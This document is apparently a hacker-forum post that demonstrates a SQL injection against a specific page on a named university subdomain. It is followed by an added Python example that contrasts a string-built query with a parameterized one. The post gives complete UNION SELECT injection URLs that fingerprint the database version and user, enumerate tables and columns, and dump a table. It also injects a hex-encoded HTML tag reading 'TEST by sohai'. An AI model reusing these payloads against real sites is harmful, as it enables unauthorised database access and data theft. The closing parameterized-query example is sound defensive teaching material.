Everyone knows about Harvard University, or we can access it at http://www.harvard.edu
But this site has a subdomain, asc . . . I had found this hole in a POC with SQLi
This bug is in details.php
Let me check:
http://asc.harvard.edu/vguide/details.php?agascid='21
Star query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''21' at line 1
So I try to find the magic number
http://asc.harvard.edu/vguide/details.php?agascid=-21-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78--
See, got it, and there were many magic numbers; I test in 3 numbers
Check the version, database, and user:
http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,concat(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78--
and
http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+information_schema.tables+where+table_schema=database()--
and
http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from information_schema.columns+where+table_name=0x6f62736964--
http://asc.harvard.edu/vguide/details.php?agascid=-21-1 union select 1,2,concat_ws(0x3a,obs_obi_id,obsid,obi,agascid,comment,mag_plot_filename,obs_data_filename,target,ccd_set_point,ydith_period,zdith_period,obsdate,obslength,0x3c63656e7465723e3c683e5445535420627920736f6861693c2f683e3c2f63656e7465723e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78+from+obsid--
Nothing special in there :D lol
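To make the defensive point behind the error message on the page concrete, here is an added example (not code from the post or from the vguide application) in Python with an in-memory SQLite table standing in for the `obsid` table, using only a few of the column names the post lists and made-up rows; it contrasts a lookup that pastes the `agascid` parameter into the SQL text with a parameterized one.

```python
import sqlite3

# Constructed stand-in for the vguide database: column names are the ones the
# post lists (a subset), the rows are invented sample data.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE obsid (obsid INTEGER, agascid INTEGER, target TEXT, comment TEXT)"
    )
    conn.executemany(
        "INSERT INTO obsid VALUES (?, ?, ?, ?)",
        [(1, 21, "M31", "sample"), (2, 22, "Cyg X-1", "sample")],
    )
    return conn

def unsafe_lookup(conn, agascid):
    # The pattern the post's "Star query failed" error points to: the raw request
    # value becomes part of the SQL text, so a stray quote breaks the statement
    # and a UNION changes what the query returns.
    sql = "SELECT obsid, agascid, target, comment FROM obsid WHERE agascid=" + agascid
    return conn.execute(sql).fetchone()

def safe_lookup(conn, agascid):
    # Hardened form: validate the id as an integer first, then bind it as a
    # parameter so the database never parses it as SQL.
    if not agascid.lstrip("-").isdigit():
        return None
    return conn.execute(
        "SELECT obsid, agascid, target, comment FROM obsid WHERE agascid=?",
        (int(agascid),),
    ).fetchone()

def run_probe(lookup, value):
    # Runs one lookup against a fresh database and reports either the row it
    # returned or the database error it raised, so both paths can be compared.
    conn = build_db()
    try:
        return ("row", lookup(conn, value))
    except sqlite3.Error as exc:
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    for value in ("21", "'21", "-21-1 union select 1,2,3,4--"):
        print(repr(value), "unsafe:", run_probe(unsafe_lookup, value),
              "safe:", run_probe(safe_lookup, value))
```

The string-built query reproduces the syntax error from the post for `'21` and hands back the attacker-chosen row for the UNION input, while the parameterized version returns the real row for `21` and nothing for either malformed value.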